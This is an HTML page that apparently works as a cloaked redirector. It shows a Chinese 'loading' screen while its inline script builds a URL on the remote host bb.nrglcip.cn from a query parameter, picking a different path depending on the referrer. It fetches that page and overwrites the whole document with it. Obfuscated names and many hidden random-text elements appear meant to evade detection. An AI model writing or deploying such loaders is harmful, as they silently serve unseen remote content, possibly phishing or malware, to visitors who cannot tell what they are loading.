<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .VzEtMKOosB {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .VzEtMKOosB .gJPLg5EkLDo {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .VzEtMKOosB .content {
            line-height: 50px;
            text-align: center
        }

        .VzEtMKOosB .img {
            width: 100%
        }

        .VzEtMKOosB .fGkBpXoSP {
            text-align: center
        }

        .VzEtMKOosB .fGkBpXoSP span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .VzEtMKOosB .fGkBpXoSP span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .VzEtMKOosB .fGkBpXoSP span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .VzEtMKOosB .fGkBpXoSP span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .VzEtMKOosB .fGkBpXoSP span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .VzEtMKOosB .fGkBpXoSP span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .VzEtMKOosB .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function hIloOAICoPgE(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var BPnHB = hIloOAICoPgE('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ BPnHB +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ BPnHB +".html?a=share";
		}
		
        vWQpOY=url+"#"+new Date().getTime();
        vWQpOY && function() {
            $.get(vWQpOY, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >YOhlklf9yNWw1HtNhfbp8q</b>
<h1 style='display:none' >tCQNFrXJG22iQFnwSE7S</h1>
<span style='display:none'>XZyhFueMpruw2r7VTV23BMQzIYfzSCh4Xc9fy1le9P605abjPn0IHTM34GKZy9lqFgDb0GgLX1wIwII9n1Jn2UGomf</span>
<p  style='display:none'>hAlhqxZzJsqmmfQ6REeGm0wCfGIDmxBT</p>
<a  href='#' style='display:none'>wRXdyLU4Eapv2PFBu62myWpjn82wWzvwGg5R2yysvBwpxyV0IRyMh2zCsrPQeIR3byF6deHtdiayLQoGhtszOZSnTlUwcjCf9d8i</a>
<h1 style='display:none' >tCQNFrXJG22iQFnwSE7S</h1>
<a  href='#' style='display:none'>wRXdyLU4Eapv2PFBu62myWpjn82wWzvwGg5R2yysvBwpxyV0IRyMh2zCsrPQeIR3byF6deHtdiayLQoGhtszOZSnTlUwcjCf9d8i</a>
<a  href='#' style='display:none'>wRXdyLU4Eapv2PFBu62myWpjn82wWzvwGg5R2yysvBwpxyV0IRyMh2zCsrPQeIR3byF6deHtdiayLQoGhtszOZSnTlUwcjCf9d8i</a>
<a  href='#' style='display:none'>wRXdyLU4Eapv2PFBu62myWpjn82wWzvwGg5R2yysvBwpxyV0IRyMh2zCsrPQeIR3byF6deHtdiayLQoGhtszOZSnTlUwcjCf9d8i</a><div class="VzEtMKOosB">
    <div class="gJPLg5EkLDo">
        <div class="fGkBpXoSP">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >fz6pk1bmTbeEukZpZNQnHCRP6eBCWWEgMDAMYu6CQ2oWRMYdLP7uawm1EP0A0ShEFJYi8FG</ul>
<span style='display:none'>cpGDbFGRR8uAWjKmnAQKMqQpM0HW7dSNuIpcu0VPHS8GbHP8saxo2FBQRibZVeF9KiQtWtRuE1FnwIP</span>
<li style='display:none' >PtOlyffVZYR1xurUxiHxVq5DhDSlmKMWn73emfWFelP4sN</li>
<ul style='display:none' >fz6pk1bmTbeEukZpZNQnHCRP6eBCWWEgMDAMYu6CQ2oWRMYdLP7uawm1EP0A0ShEFJYi8FG</ul>
<li style='display:none' >PtOlyffVZYR1xurUxiHxVq5DhDSlmKMWn73emfWFelP4sN</li>
<span style='display:none'>cpGDbFGRR8uAWjKmnAQKMqQpM0HW7dSNuIpcu0VPHS8GbHP8saxo2FBQRibZVeF9KiQtWtRuE1FnwIP</span>
<span style='display:none'>cpGDbFGRR8uAWjKmnAQKMqQpM0HW7dSNuIpcu0VPHS8GbHP8saxo2FBQRibZVeF9KiQtWtRuE1FnwIP</span>
<p  style='display:none'>T5NW979xcDDZAckYCK5</p></body>
</html>